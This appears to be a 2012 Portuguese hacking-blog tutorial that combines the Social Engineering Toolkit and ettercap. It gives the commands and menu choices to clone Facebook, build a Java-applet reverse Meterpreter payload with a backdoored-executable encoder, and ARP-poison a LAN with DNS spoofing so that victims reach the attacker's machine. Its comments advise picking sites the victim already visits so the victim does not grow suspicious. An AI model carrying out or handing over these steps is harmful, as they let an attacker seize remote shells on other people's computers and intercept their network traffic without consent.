domingo, 17 de junho de 2012

S.E.T + ettercap

oque é isto?

bom o S.E.T é uma ferramenta complexa, mas neste tutorial usaremos uma das opções.
uma falha no aplicativo java applet permite fazer um download do binario gerado pelo metasploit contendo um código malicioso...e com isso... meterpreter session->.

oque eu preciso?

>metasploit,SET,ettercap & wireshark...

instalando o SET:
->abra a shell(terminal)
>cd /pentest/exploits/
>svn co http://svn.secmaniac.com/social_engineering_toolkit set/
instalado!

Enter your choice (press enter for default): 1 para utilizar a falha do java applet para conseguir a shell do sistema*\
[!] Website Attack Vectors [!]

1. Web Templates
2. Site Cloner
3. Custom Import
4. Return to main menu
Enter number (1-4): 2

SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: www.facebook.com /aqui você poe algum site que a 'vitima' esta acessando para ela não desconfiar do spoof*\

Name: Description:

1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell Execute payload and create an accepting port on remote system.
5. Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
6. Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
7. Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
8. Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
9. Import your own executable Specify a path for your own executable

Enter choice (hit enter for default): 2 /* para conexão reversa utilizando o meterpreter*\

Select one of the below, 'backdoored executable' is typically the best.
1. avoid_utf8_tolower (Normal)
2. shikata_ga_nai (Very Good)
3. alpha_mixed (Normal)
4. alpha_upper (Normal)
5. call4_dword_xor (Normal)
6. countdown (Normal)
7. fnstenv_mov (Normal)
8. jmp_call_additive (Normal)
9. nonalpha (Normal)
10. nonupper (Normal)
11. unicode_mixed (Normal)
12. unicode_upper (Normal)
13. alpha2 (Normal)
14. No Encoding (None)
15. Multi-Encoder (Excellent)
16. Backdoored Executable (BEST)

Enter your choice (enter for default): 16 /*é o mais recomendado mas pode usar outros, vai de você*\
[-] Enter the PORT of the listener (enter for default): 443 /*essa porta é uma qualquer a padrão é a 443, eu libero a 888 quando vou gerar*\


Do you want to create a Linux/OSX reverse_tcp payload
in the Java Applet attack as well?
Enter choice yes or no: no /*eu coloco no pq é dificil encontrar linux nas redes daqui*\

se tudo der certo, ele abrirá o metasploit e ficará assim:
msf exploit(handler) > /*esperando uma sessão *\

ok ok ok, e agora? como eu consigo a shell?ãn?

gogogo...

abrá outro terminal
digite:
kwrite /usr/share/ettercap/etter.dns

*.facebook.com A 192.168.1.103 /*coloque o ip da sua maquina*\

aperte ctrl+x
aperte y ou digite yes
aperte qualquer tecla
o kwrite irá fechar...

rode o ettercap
ettercap –T –q –P dns_spoof –M arp // // /*comando para spoffar as vitimas para o seu computador*\

← Postagem mais recente Postagem mais antiga → Página inicial

0 comentários:

Postar um comentário

Copyright © Hacking & Security | Powered by Xandao Design by Xandao86 | Xandao86